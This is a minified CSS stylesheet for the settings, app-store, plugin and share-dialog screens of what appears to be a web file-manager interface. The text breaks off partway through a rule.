.file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}body{-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;overflow-x:hidden;}body ul{margin:0;padding:0;}body li{margin:0;padding:0;}#body a,body a{text-decoration:none;}#body input[type='text'],#body input[type='password'],body input[type='text'],body input[type='password']{padding-left:0.5em;outline:none;border:1px solid #bbb;border:1px solid #ddd;background:#fff;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;border-radius:3px;}#body input[type='text']:focus,#body input[type='password']:focus,body input[type='text']:focus,body input[type='password']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}#body .font-icon,body .font-icon{padding-right:0.8em;display:inline-block;}#body .system-content .left-frame .left-content .role-box ul li.select,body .system-content .left-frame .left-content .role-box ul li.select{background:#80DBFF;}#body .system-content .left-frame .left-content .ztree li a,body .system-content .left-frame .left-content .ztree li a{border:1px solid #fff;padding:0px;}#body .system-content .left-frame .left-content .ztree li a.hover,body .system-content .left-frame .left-content .ztree li a.hover{border:1px solid #63acff;color:#444;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode,body .system-content .left-frame .left-content .ztree li a.curSelectedNode{color:#666;border:1px solid #63acff;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover,body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover{color:#666;border:1px solid #63acff;}#body .panel,body .panel{border-radius:0;margin-right:30px;}#body .panel-default>.panel-heading,body .panel-default>.panel-heading{background:#eee;padding:8px 15px;}#body .panel-title,body .panel-title{font-size:1.1em;}#body .setting-tab,#body .system-content,body .setting-tab,body .system-content{margin-right:30px;}#body .setting-tab .panel-body,#body .system-content .panel-body,body .setting-tab .panel-body,body .system-content .panel-body{padding:20px 0 0 0;}#body .setting-tab .form-row,#body .system-content .form-row,body .setting-tab .form-row,body .system-content .form-row{padding:0 5px;}#body .setting-tab .line,#body .system-content .line,body .setting-tab .line,body .system-content .line{margin:10px 10px;}#body .setting-tab .form-row .setting-title,#body .system-content .form-row .setting-title,body .setting-tab .form-row .setting-title,body .system-content .form-row .setting-title{text-align:left;}#body .setting-tab .form-row-submit,#body .system-content .form-row-submit,body .setting-tab .form-row-submit,body .system-content .form-row-submit{background:#eee;margin:10px 0 10px 0;border-top:1px solid #ddd;height:60px;width:100%;}#body .setting-tab .form-row-submit .setting-content,#body .system-content .form-row-submit .setting-content,body .setting-tab .form-row-submit .setting-content,body .system-content .form-row-submit .setting-content{margin:10px;}#body .setting-tab .form-row-submit .btn,#body .system-content .form-row-submit .btn,body .setting-tab .form-row-submit .btn,body .system-content .form-row-submit .btn{padding:4px 2em;margin-left:10px;}#body .setting-tab .form-row-submit .btn.btn-remove,#body .system-content .form-row-submit .btn.btn-remove,body .setting-tab .form-row-submit .btn.btn-remove,body .system-content .form-row-submit .btn.btn-remove{float:right;color:#666;background:none;}#body .setting-tab .form-row-submit .save,#body .system-content .form-row-submit .save,body .setting-tab .form-row-submit .save,body .system-content .form-row-submit .save{width:60px;}#body .setting-tools-right,body .setting-tools-right{position:absolute;right:30px;top:27px;}#body .setting-tools-right .version-vip,body .setting-tools-right .version-vip{display:inline-block;float:right;right:120px;top:26px;text-align:center;padding:0px 10px;height:24px;line-height:24px;border-radius:3px;}#body .setting-tools-right .system-setting-more,body .setting-tools-right .system-setting-more{margin-left:10px;}#body .color-default,body .color-default{position:absolute;left:500px;top:28px;margin-top:43px;width:325px;border-radius:6px;box-shadow:0 0 20px #ddd inset;}#body .color-default .color-list,body .color-default .color-list{width:50px;height:50px;float:left;margin:7px;cursor:pointer;box-shadow:0 0 10px #ddd;border-radius:50%;}#body .color-default .color-list:hover,body .color-default .color-list:hover{box-shadow:0 0 10px rgba(0,0,0,0.5);}#body .ztree,body .ztree{padding:5px 5px;}#body .menu-left,body .menu-left{position:fixed;z-index:10;background:#f9f9f9;left:0;height:100%;width:18%;border-right:1px solid #ddd;margin-left:-1px;}#body .menu-left h1,body .menu-left h1{text-align:left;color:#666;padding:15px 20px 10px 30px;font-size:35px;font-weight:800;margin:0;padding:10px 0px 10px 20px;font-size:28px;height:50px;line-height:50px;letter-spacing:2px;}#body .menu-left .setting a,body .menu-left .setting a{height:40px;line-height:40px;text-decoration:none;box-sizing:border-box;text-indent:8px;color:#666;display:block;overflow:hidden;cursor:pointer;text-transform:capitalize;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;font-size:15px;}#body .menu-left .setting a:hover,body .menu-left .setting a:hover{background:#f3f3f3;}#body .menu-left .setting a.selected,body .menu-left .setting a.selected{background:#ddd;color:#000;border-left:5px solid #EA533F;padding-left:10px;}#body .main .dropdown-menu,body .main .dropdown-menu{font-size:13px;}#body .main.app-content,body .main.app-content{left:160px;right:0;bottom:0;top:0;margin:0;width:auto;height:auto;}#body .main.app-content .app-model,body .main.app-content .app-model{position:absolute;bottom:0;top:0px;left:0px;right:0;overflow:auto;padding:20px;overflow-x:hidden;}#body .main.app-content .app-model .h1,body .main.app-content .app-model .h1{border-bottom:1px solid #ddd;padding-bottom:10px;}#body .main.app-content .app-model .search-words,body .main.app-content .app-model .search-words{font-size:14px;position:absolute;padding:5px 10px;margin:0 10px;}#body .main.app-content .app-model .clear-search-btn,body .main.app-content .app-model .clear-search-btn{cursor:pointer;display:inline-block;}#body .main.app-content .app-model .clear-search-btn:hover,body .main.app-content .app-model .clear-search-btn:hover{color:#f6b29b;}#body .main.app-content .app-list,body .main.app-content .app-list{margin-top:10px;margin-right:-15px;padding:10px 0 40px 0;display:flex;justify-content:space-between;flex-wrap:wrap;}#body .main.app-content .app-list .flex-empty,body .main.app-content .app-list .flex-empty{margin:0 15px 20px 0;width:140px;height:0;}#body .main.app-content .app-list .app-li,body .main.app-content .app-list .app-li{list-style:none;cursor:pointer;text-align:center;float:left;margin:0 15px 20px 0;width:140px;height:200px;background:#f5faff;color:#2196F3;border:1px solid #d2d7dc;position:relative;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;border-radius:4px;background:none;border:1px solid #dee5e7;box-shadow:0 1px 2px rgba(0,0,0,0.1);}#body .main.app-content .app-list .app-li:hover,body .main.app-content .app-list .app-li:hover{background:#e2f2ff;}#body .main.app-content .app-list .app-li:hover,body .main.app-content .app-list .app-li:hover{background:#fff;box-shadow:0px 20px 100px rgba(0,0,0,0.1), 0px 20px 30px rgba(0,0,0,0.05);}#body .main.app-content .app-list .app-li .price-label,body .main.app-content .app-list .app-li .price-label{position:absolute;top:10px;right:-1px;border-radius:0;line-height:24px;height:24px;padding:0 10px;box-shadow:-3px 2px 5px rgba(0,0,0,0.3);}#body .main.app-content .app-list .app-li .price-label.label:before,body .main.app-content .app-list .app-li .price-label.label:before{position:absolute;top:0;left:-14px;content:" ";height:0;width:0;border:#f0ad4e 12px solid;border-left-color:transparent;}#body .main.app-content .app-list .app-li .price-label.label-warning,body .main.app-content .app-list .app-li .price-label.label-warning{background:#ff9800;}#body .main.app-content .app-list .app-li .price-label.label-warning.label:before,body .main.app-content .app-list .app-li .price-label.label-warning.label:before{border-color:#ff9800;border-left-color:transparent;}#body .main.app-content .app-list .app-li .price-label.label-success,body .main.app-content .app-list .app-li .price-label.label-success{background:#00a854;}#body .main.app-content .app-list .app-li .price-label.label-success.label:before,body .main.app-content .app-list .app-li .price-label.label-success.label:before{border-color:#00a854;border-left-color:transparent;}#body .main.app-content .app-list .app-li .icon,body .main.app-content .app-list .app-li .icon{background-image:linear-gradient(to bottom,#def 0,#fff 100%);border-radius:4px;}#body .main.app-content .app-list .app-li .flag-box,body .main.app-content .app-list .app-li .flag-box{overflow:hidden;position:absolute;right:0;width:60px;height:60px;}#body .main.app-content .app-list .app-li .flag,body .main.app-content .app-list .app-li .flag{position:absolute;top:10px;right:-28px;width:100px;height:22px;line-height:22px;box-shadow:0 1px 5px rgba(0,0,0,0.2);font-size:12px;color:#fff;overflow:hidden;text-overflow:ellipsis;transform:rotate(45deg);}#body .main.app-content .app-list .app-li .text,body .main.app-content .app-list .app-li .text{height:50px;}#body .main.app-content .app-list .app-li .name,body .main.app-content .app-list .app-li .name{color:#444;font-weight:800;margin:10px 5px 0;max-height:32px;overflow:hidden;}#body .main.app-content .app-list .app-li .copyright,body .main.app-content .app-list .app-li .copyright{color:#aaa;max-height:32px;overflow:hidden;}#body .main.app-content .app-list .app-li .icon,body .main.app-content .app-list .app-li .icon{height:90px;background-color:rgba(0,0,0,0.01);}#body .main.app-content .app-list .app-li .icon img,body .main.app-content .app-list .app-li .icon img{max-width:100%;max-height:100%;width:72px;border-radius:10%;}#body .main.app-content .app-list .app-li .icon .content,body .main.app-content .app-list .app-li .icon .content{width:80px;height:80px;padding:10px;margin:0 auto;}#body .main.app-content .app-list .app-li .icon .content .font-icon,body .main.app-content .app-list .app-li .icon .content .font-icon{width:55px;height:55px;line-height:52px;font-size:40px;text-align:center;background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));padding:10px;margin-top:1px;display:inline-block;border-radius:12px;color:#fff;}#body .main.app-content .app-list .app-li .icon .content .font-icon.words,body .main.app-content .app-list .app-li .icon .content .font-icon.words{font-size:26px;font-weight:800;text-shadow:0 0 5px rgba(255,255,255,0.8);}#body .main.app-content .app-list .app-li .action i,body .main.app-content .app-list .app-li .action i{padding-right:0.3em;color:inherit;}#body .main.app-content .app-list .app-li .action .btn.btn-default i.font-icon,body .main.app-content .app-list .app-li .action .btn.btn-default i.font-icon{color:#999;}#body .main.app-content .app-list .app-li .action>.btn,body .main.app-content .app-list .app-li .action>.btn{float:none;width:80px;height:22px;height:22px\0;padding-left:0;padding-right:0;}#body .main.app-content .app-list .app-li .action .btn-default.dropdown-toggle,body .main.app-content .app-list .app-li .action .btn-default.dropdown-toggle{color:#aaa;}#body .main.app-content .app-list .app-li .action .dropdown-toggle,body .main.app-content .app-list .app-li .action .dropdown-toggle{width:25px;}#body .main.app-content .app-list .app-li .action .dropdown-menu,body .main.app-content .app-list .app-li .action .dropdown-menu{min-width:130px;text-align:left;margin-top:-1px;}#body .main.app-content .app-list .empty,body .main.app-content .app-list .empty{margin:50px auto;font-size:20px;color:#888;}#body .main.app-content .app-list .empty .icon,body .main.app-content .app-list .empty .icon{background:url("../../../images/file_icon/icon_others/appStore.png");width:120px;height:120px;margin:0 auto;margin-bottom:20px;background-size:cover;}#body .main.app-content .progress,body .main.app-content .progress{border-radius:0px;margin:0 auto;color:#42a3f1;font-size:12px;height:23px;background:none;border:none;box-shadow:none;}#body .main.app-content .progress .total-size,body .main.app-content .progress .total-size{position:absolute;left:5px;z-index:100;line-height:20px;}#body .main.app-content .progress .download-speed,body .main.app-content .progress .download-speed{position:absolute;right:4px;z-index:100;line-height:20px;}#body .main.app-content .progress .progress-bar,body .main.app-content .progress .progress-bar{position:absolute;left:0px;bottom:-1px;border-bottom:2px solid #2196F3;background:none;border-radius:3px;box-shadow:none;height:100%;background:rgba(33,150,243,0.2);animation:progress-bar-stripes 2s linear infinite;}#body .main.app-content.app-plugins .app-li .icon img,body .main.app-content.app-plugins .app-li .icon img{border-radius:0;box-shadow:none;border-radius:4px 4px 0 0;}#body .main.app-content.app-plugins .app-li .action .dropdown-toggle,body .main.app-content.app-plugins .app-li .action .dropdown-toggle{margin-left:-5px;}#body.plugin-page .app-menu-left .line,body.plugin-page .app-menu-left .line{margin:5px 10px 5px 20px;color:#6B95B2;padding:4px 6px;border-bottom:1px solid #EBF0F5;border-color:rgba(150,150,150,0.3);}#body.plugin-page .app-menu-left .search input,body.plugin-page .app-menu-left .search input{width:105px;height:25px;margin:10px 10px 10px 20px;padding-left:24px !important;}#body.plugin-page .app-menu-left .search .search-btn,body.plugin-page .app-menu-left .search .search-btn{position:absolute;width:25px;height:25px;line-height:25px;padding:0;color:#888;cursor:pointer;text-align:center;}#body.plugin-page .app-menu-left .search .search-btn:hover,body.plugin-page .app-menu-left .search .search-btn:hover{color:#444;}#body.plugin-page .app-menu-left .search .search-btn.btn-search,body.plugin-page .app-menu-left .search .search-btn.btn-search{top:11px;left:21px;height:27px;width:27px;}#body.plugin-page .app-menu-left .search .search-btn.btn-close,body.plugin-page .app-menu-left .search .search-btn.btn-close{left:128px;top:14px;width:20px;height:20px;line-height:20px;background:#eee;border-radius:50%;}#body.plugin-page .app-config .panel-body,body.plugin-page .app-config .panel-body{padding:20px 0;}#body.plugin-page .app-config .header,body.plugin-page .app-config .header{padding:0px 0 5px 0;border-bottom:1px solid #ddd;}#body.plugin-page .app-config .header .btn,body.plugin-page .app-config .header .btn{position:absolute;top:10px;}#body.plugin-page .app-config .header .name,body.plugin-page .app-config .header .name{color:#0086E5;font-size:18px;font-weight:800;text-align:center;}#body.plugin-page .app-descript .header,body.plugin-page .app-descript .header{padding:0px 0 5px 0;}#body.plugin-page .app-descript .header .btn,body.plugin-page .app-descript .header .btn{position:absolute;top:10px;}#body.plugin-page .app-descript .header .name,body.plugin-page .app-descript .header .name{color:#0086E5;font-size:18px;font-weight:800;text-align:center;margin-left:200px;}#body.plugin-page .app-descript h1,#body.plugin-page .app-descript h2,#body.plugin-page .app-descript h3,#body.plugin-page .app-descript h4,#body.plugin-page .app-descript h5,#body.plugin-page .app-descript .h1,#body.plugin-page .app-descript .h2,#body.plugin-page .app-descript .h3,#body.plugin-page .app-descript .h4,#body.plugin-page .app-descript .h5,body.plugin-page .app-descript h1,body.plugin-page .app-descript h2,body.plugin-page .app-descript h3,body.plugin-page .app-descript h4,body.plugin-page .app-descript h5,body.plugin-page .app-descript .h1,body.plugin-page .app-descript .h2,body.plugin-page .app-descript .h3,body.plugin-page .app-descript .h4,body.plugin-page .app-descript .h5{border-bottom:1px solid #ddd;padding:0.5em 0;}#body.plugin-page .app-descript .left-content,body.plugin-page .app-descript .left-content{position:absolute;left:20px;top:50px;width:150px;padding:15px;margin:0 0 20px 0;background:#fafdff;color:#888;border:1px solid #eee;}#body.plugin-page .app-descript .left-content .icon,body.plugin-page .app-descript .left-content .icon{height:90px;background-color:rgba(0,0,0,0.001);}#body.plugin-page .app-descript .left-content .icon img,body.plugin-page .app-descript .left-content .icon img{max-width:100%;max-height:100%;border-radius:10px;}#body.plugin-page .app-descript .left-content .icon .content,body.plugin-page .app-descript .left-content .icon .content{width:80px;height:80px;padding:10px;margin:0 auto;}#body.plugin-page .app-descript .left-content .icon .content .font-icon,body.plugin-page .app-descript .left-content .icon .content .font-icon{width:55px;height:55px;line-height:52px;font-size:40px;text-align:center;background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));padding:10px;margin-top:1px;display:inline-block;border-radius:12px;color:#fff;}#body.plugin-page .app-descript .left-content .icon .content .font-icon.words,body.plugin-page .app-descript .left-content .icon .content .font-icon.words{font-size:26px;font-weight:800;text-shadow:0 0 5px rgba(255,255,255,0.8);}#body.plugin-page .app-descript .left-content .btn,body.plugin-page .app-descript .left-content .btn{margin:10px 0 0;width:80px;}#body.plugin-page .app-descript .left-content .btn.dropdown-toggle,body.plugin-page .app-descript .left-content .btn.dropdown-toggle{width:20px;margin-left:-1px;}#body.plugin-page .app-descript .left-content .app-title,body.plugin-page .app-descript .left-content .app-title{text-align:center;color:#555;padding:15px 10px 0 10px;}#body.plugin-page .app-descript .left-content .line,body.plugin-page .app-descript .left-content .line{border-bottom:1px solid #eee;margin:10px 0;}#body.plugin-page .app-descript .left-content .title,body.plugin-page .app-descript .left-content .title{color:#444;font-weight:800;padding:10px 0 3px 15px;}#body.plugin-page .app-descript .left-content .p,body.plugin-page .app-descript .left-content .p{padding:0 0 0 15px;}#body.plugin-page .app-descript .right-content,body.plugin-page .app-descript .right-content{position:absolute;left:200px;right:20px;top:45px;}#body.plugin-page .app-descript .right-content .description,body.plugin-page .app-descript .right-content .description{padding:10px 0 20px 15px;line-height:1.6em;word-break:break-all;font-size:13px;}#body.plugin-page .app-descript .right-content .sliders,body.plugin-page .app-descript .right-content .sliders{margin:5px 0 30px 20px;padding:0;}#body.plugin-page .app-descript .right-content .carousel-indicators,body.plugin-page .app-descript .right-content .carousel-indicators{bottom:-40px !important;}#body.plugin-page .app-descript .right-content .carousel-indicators li,body.plugin-page .app-descript .right-content .carousel-indicators li{border-color:#ccc;}#body.plugin-page .app-descript .right-content .carousel-indicators .active,body.plugin-page .app-descript .right-content .carousel-indicators .active{background:#2196F3;border-color:#2865e2;background:linear-gradient(to right,#44abf6,#2865e2);}#body.plugin-page .app-descript .right-content .glyphicon,body.plugin-page .app-descript .right-content .glyphicon{font-size:50px;margin-top:-30px !important;border-radius:50%;}#body.plugin-page .app-descript .right-content .carousel-control,body.plugin-page .app-descript .right-content .carousel-control{background:rgba(0,0,0,0.001) !important;width:20%;}#body.plugin-page .app-descript .right-content .carousel-control:hover .glyphicon,body.plugin-page .app-descript .right-content .carousel-control:hover .glyphicon{background:rgba(0,0,0,0.3);}#body.plugin-page .app-descript .right-content .carousel-inner,body.plugin-page .app-descript .right-content .carousel-inner{width:100%;text-align:center;}#body.plugin-page .app-descript .right-content .carousel-inner .item,body.plugin-page .app-descript .right-content .carousel-inner .item{height:350px;line-height:350px;width:100%;}#body.plugin-page .app-descript .right-content .carousel-inner .item img,#body.plugin-page .app-descript .right-content .carousel-inner .item a img,body.plugin-page .app-descript .right-content .carousel-inner .item img,body.plugin-page .app-descript .right-content .carousel-inner .item a img{margin:0 auto;max-width:100%;max-height:100%;display:inline;box-shadow:0 1px 5px rgba(0,0,0,0.4);}#body.plugin-page .app-descript .progress,body.plugin-page .app-descript .progress{background:#def;margin:10px 0;position:relative;}#body.plugin-page .app-descript .progress .progress-bar,body.plugin-page .app-descript .progress .progress-bar{border-bottom:4px solid #2196F3;border-radius:0;}#body .randomImage,body .randomImage{width:25px;height:25px;margin-left:15px;cursor:pointer;}#body .main,body .main{position:absolute;left:18%;width:82%;height:93%;margin:30px 0 0 10px;}#body .main .h1 .font-icon,body .main .h1 .font-icon{padding-right:16px;}#body .main div.h1,body .main div.h1{font-weight:400;color:#666;padding-bottom:8px;margin:0;font-size:22px;}#body .main .savebox,body .main .savebox{border-top:1px solid #eee;margin-bottom:10px;}#body .main .savebox a.save,body .main .savebox a.save{margin-left:5px;margin-top:5px;padding:4px 20px;}#body .main .section .box,body .main .section .box{display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;margin-right:20px;}#body .main .section .box .flex-list,body .main .section .box .flex-list{float:left;width:140px;margin-right:10px;margin-bottom:0px;}#body .main .section .box .list,body .main .section .box .list{float:left;width:140px;height:115px;margin-right:10px;margin-bottom:15px;border:1px solid #ddd;background:#fff;cursor:pointer;border-radius:3px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}#body .main .section .box .list .ico,body .main .section .box .list .ico{width:120px;height:80px;margin:10px;text-align:center;}#body .main .section .box .list .theme,body .main .section .box .list .theme{margin:5px 10px;}#body .main .section .box .list .info,body .main .section .box .list .info{text-align:center;color:#666;margin:0px;margin-top:0px;font-size:1em;height:24px;line-height:24px;border-top:1px solid #eee;background:rgba(0,0,0,0.05);overflow:hidden;}#body .main .section .box .list .ico img,body .main .section .box .list .ico img{max-width:100%;height:100%;}#body .main .section .box .list.this,body .main .section .box .list.this{border:1px solid #63acff;background-color:#c9e2ff;}#body .main .section .box .list.this .info,body .main .section .box .list.this .info{color:#444;border-top:1px solid #c9e2ff;}#body .main .section .box .list.listhover,body .main .section .box .list.listhover{border:1px solid #63acff;}#body .main .section .content,body .main .section .content{word-break:break-all;color:#448;margin-bottom:20px;}#body .main .section .content h2,body .main .section .content h2{border-bottom:1px dashed #eef;padding-bottom:5px;margin-bottom:5px;font-weight:400;font-size:1.25em;}#body .main .section .content p,body .main .section .content p{margin-left:5px;text-indent:2em;margin-bottom:8px;color:#666;font-size:1em;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:100%;}#body .main .section .content .box,body .main .section .content .box{color:#555;clear:both;color:#666;}#body .main .section .content .box .title,body .main .section .content .box .title{color:#444;border-bottom:1px dashed #ddd;width:100%;font-size:21px;margin-bottom:10px;margin-top:10px;}#body .main .section .content .box .title span,body .main .section .content .box .title span{border-bottom:1px solid #aaa;display:inline-block;margin-bottom:-1px;text-align:center;padding:5px 10px;float:none;width:auto;}#body .main .section .content .box p,body .main .section .content .box p{line-height:1.7em;text-indent:2em;padding:3px;margin:0;}#body .main .section .content .box p b,body .main .section .content .box p b{padding-right:8px;}#body .main .section .content .box p i,body .main .section .content .box p i{padding-right:10px;}#body .main .nav,body .main .nav{margin-right:30px;border-bottom:2px solid #63acff;}#body .main .nav a,body .main .nav a{display:block;float:left;padding:5px 1.8em;background:#eee;border:none;margin:0;-webkit-transition:all 0.218s;-moz-transition:all 0.218s;-o-transition:all 0.218s;-ms-transition:all 0.218s;transition:all 0.218s;color:#666;}#body .main .nav a:hover,body .main .nav a:hover{background:#e1efff;border:none;color:#63acff;}#body .main .nav a.this,#body .main .nav a.this:hover,body .main .nav a.this,body .main .nav a.this:hover{background:#63acff;border:none;color:#fff;}#body .main .member input,body .main .member input{display:inline-block;width:45px;margin-left:2px;}#body .main .member span,body .main .member span{padding-left:10px;}#body .main .member select,body .main .member select{padding:3px 5px;font-family:"微软雅黑";color:#666;}#body .main .member .info,body .main .member .info{background:#efe;padding:6px 10px;color:#8a8;border:#ccc 1px dotted;margin-top:10px;}#body .main .member .edit-role,body .main .member .edit-role{color:#666;}#body .main .member .edit-role:hover,body .main .member .edit-role:hover{border-bottom:1px solid #666;}#body .main .together,body .main .together{margin-top:-1px;border-bottom:1px solid #eee;padding:5px 0 0 0px;width:100%;}#body .main .together .title,body .main .together .title{float:left;width:80px;height:28px;margin:5px;color:#333;}#body .main .together .title i,body .main .together .title i{padding-left:5px;font-style:normal;}#body .main .together span.text,body .main .together span.text{color:#bbb;font-size:1em;padding-left:10px;}#body .main .together.input input,body .main .together.input input{width:40%;margin-left:5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:26px;line-height:26px;}#body .main .together.input input:focus,body .main .together.input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}#body .main .group-editor .tag,body .main .group-editor .tag{height:27px;line-height:27px;margin:2px 4px;padding:0px 8px;text-decoration:none;color:#666;-webkit-transition:all 0.218s;-moz-transition:all 0.218s;-o-transition:all 0.218s;-ms-transition:all 0.218s;transition:all 0.218s;display:block;float:left;border:1px solid #eee;background:#fff;}#body .main .group-editor .tag input,body .main .group-editor .tag input{border:none;position:relative;top:-4px;display:inline-block;min-height:12px;margin-right:6px;}#body .main .group-editor .tag:hover,body .main .group-editor .tag:hover{color:#63acff;border-color:rgba(99,172,255,0.7);}#body .main .group-editor .tag.this,body .main .group-editor .tag.this{border-color:#63acff;color:#63acff;background:#ffffff;}#body .main .group-editor .tag span,body .main .group-editor .tag span{cursor:pointer;}#body .main .group-editor .together a.button,body .main .group-editor .together a.button{margin:0 0 0 10px;}#body .alert,body .alert{position:absolute;right:30px;left:0px;margin-top:10px;}#body .main .content .title span,body .main .content .title span{border-bottom:2px solid #bbb;}#body .main .panel,body .main .panel{margin-left:-1px;}#body .main .panel table .title,body .main .panel table .title{font-size:1.15em;}#body .main .panel table .button,body .main .panel table .button{margin-left:0px;}#body .main .panel table .title span,body .main .panel table .title span{border:none;}#body .main .panel table .menu-list .name input,body .main .panel table .menu-list .name input{width:90%;font-weight:400;}#body .main .panel table .menu-list .path input,body .main .panel table .menu-list .path input{width:90%;font-weight:400;}#body .menu-list,body .menu-list{color:#666;}#body .menu-list td span,body .menu-list td span{display:none;}#body .menu-list td label,body .menu-list td label{float:right;margin-right:8px;line-height:34px;padding-top:0px;}#body .menu-list td label input,body .menu-list td label input{margin-right:5px;}#body .menu-list td.url input[type=text],body .menu-list td.url input[type=text]{width:50% !important;float:left;margin-top:5px;}#body .menu-list td label span,body .menu-list td label span{display:inline-block;}#body .menu-system td input[type='text'],body .menu-system td input[type='text']{display:none !important;}#body .menu-system td span,body .menu-system td span{display:inline !important;}#body .menu-system .move-del,body .menu-system .move-del{display:none !important;}#body .menu-hidden,body .menu-hidden{opacity:0.5;}#body .setting-menu table tr td.url,body .setting-menu table tr td.url{line-height:30px;}#body .save,body .save{width:auto;}#body .main .select table a.button,body .main .select table a.button{padding:0 8px;}#body input[type="radio"],body input[type="radio"]{width:auto;border:none;}#body .setting-menu,body .setting-menu{margin-left:-1px;}#body .setting-tab table,body .setting-tab table{font-size:1em;color:#888;width:100%;margin:0px;border:none;border:1px solid #eee;margin:10px 0 0px 1px;}#body .setting-tab table tr,body .setting-tab table tr{border-bottom:1px solid #eee;background:#fff;height:30px;}#body .setting-tab table tr input[type='text'],body .setting-tab table tr input[type='text']{display:block;width:80%;color:#888;height:24px;}#body .setting-tab table tr.title,body .setting-tab table tr.title{background:#fff;color:#224;line-height:2.5em;height:2.5em;}#body .setting-tab table tr.title td,body .setting-tab table tr.title td{border-bottom:1px solid #eee;font-weight:800;}#body .setting-tab table tr.title span,body .setting-tab table tr.title span{color:#999;font-size:1em;padding-left:4px;font-weight:400;}#body .setting-tab table tr td,body .setting-tab table tr td{border-bottom:1px solid #eee;line-height:2.5em;height:2.5em;padding-left:3%;border-right:1px solid #eee;}#body .setting-tab table tr td.name,body .setting-tab table tr td.name{width:30%;}#body .setting-tab table tr td.name,#body .setting-tab table tr td.path,body .setting-tab table tr td.name,body .setting-tab table tr td.path{border-right:1px solid #eee;}#body .setting-tab table tr td.action,body .setting-tab table tr td.action{line-height:1.3em;}#body .setting-tab table tr td.action a,body .setting-tab table tr td.action a{margin-right:5px;}#body .setting-tab table tr td .font-icon,body .setting-tab table tr td .font-icon{padding-right:0em;color:#666;}#body a.add,body a.add{display:block;text-align:center;text-decoration:none;line-height:25px;height:25px;color:#444;box-shadow:none;border:1px solid #ddd;margin:-1px 0 20px 1px;background:#f3f3f3;}#body a.add:hover,body a.add:hover{background:#cde;}#body .create-app,body .create-app{margin:0;display:block;position:absolute;right:20px;margin-top:-5px;}#body .app-menu-left,body .app-menu-left{min-width:160px;width:160px;}#body .app-menu-left .setting li.selected,body .app-menu-left .setting li.selected{padding-left:12px;}body.setting-page a.font-icon-label{color:#698ebf;font-size:20px;width:35px;text-decoration:none;padding:0;display:inline-block;text-align:center;border-radius:3px;background:#E9F3F9;}body.setting-page a.font-icon-label:hover{background:#698ebf;color:#fff;}body.setting-page a.font-icon-label .font-icon{padding:0 !important;}body.setting-page .select-drop-menu.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle),body.setting-page .button-aciton-muti.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-radius:2px;}body.setting-page .select-drop-menu ul.dropdown-menu,body.setting-page .button-aciton-muti ul.dropdown-menu{border:1px solid rgba(0,0,0,0.15);box-shadow:0 4px 30px rgba(0,0,0,0.2);}body.setting-page .select-drop-menu ul.dropdown-menu li>a,body.setting-page .select-drop-menu ul.dropdown-menu li>a,body.setting-page .button-aciton-muti ul.dropdown-menu li>a,body.setting-page .button-aciton-muti ul.dropdown-menu li>a{font-size:13px;padding:3px 30px;color:#666;}body.setting-page .select-drop-menu ul.dropdown-menu li>a:focus,body.setting-page .select-drop-menu ul.dropdown-menu li>a:hover,body.setting-page .button-aciton-muti ul.dropdown-menu li>a:focus,body.setting-page .button-aciton-muti ul.dropdown-menu li>a:hover{background:#63acff;color:#fff;}body.setting-page .aui-title{font-size:1em;}body.setting-page .label-info{color:#698ebf;background:#E9F3F9;font-weight:400;font-style:12px;}.share-dialog .space-info-bar{margin:0 auto;margin-top:5px;}.share-dialog .label-default{background-color:#bbb;}.share-dialog .space-info-bar .space-process .space-process-use{background-color:#284b5a;}.share-dialog .select-drop-menu button.btn{width:150px;height:25px;}.share-dialog .select-drop-menu .selected{background-color:#def;}.share-dialog .select-parent-content .btn{width:140px;}.share-dialog .select-parent-content .icon-group{color:#FC913F;}.share-dialog .btn-default{background:#fefefe;background-image:none;filter:none;padding:2px 6px;}.share-dialog .dialog-group-display{width:270px;position:relative;left:90px;top:-33px;clear:both;margin-bottom:-20px;}.share-dialog .dialog-group-display .cell span.label{float:left;margin:4px 8px 4px 0;font-size:1em;cursor:default;}body.setting-page .ztree a{border:none;padding-left:3px;}body.setting-page .ztree a:hover{border:none;}body.setting-page .ztree li a.curSelectedNode{color:#fff;}body.setting-page .ztree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}body.setting-page .ztree .hover .sub-menu{display:inline-block;color:#666;}body.setting-page .ztree .curSelectedNode .sub-menu,body.setting-page .ztree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}textarea#name{width:157px;height:80px;border:1px solid #ddd;font-size:13px;border-radius:3px;outline:none;}textarea#name:focus{border-color:#75a1f0;box-shadow:0 0 4px #75a1f0;}body.setting-page .select-parent-content .ztree{position:absolute;left:90px;width:160px;margin-top:-2px;padding:0;z-index:100;background-color:#fff;border:1px solid 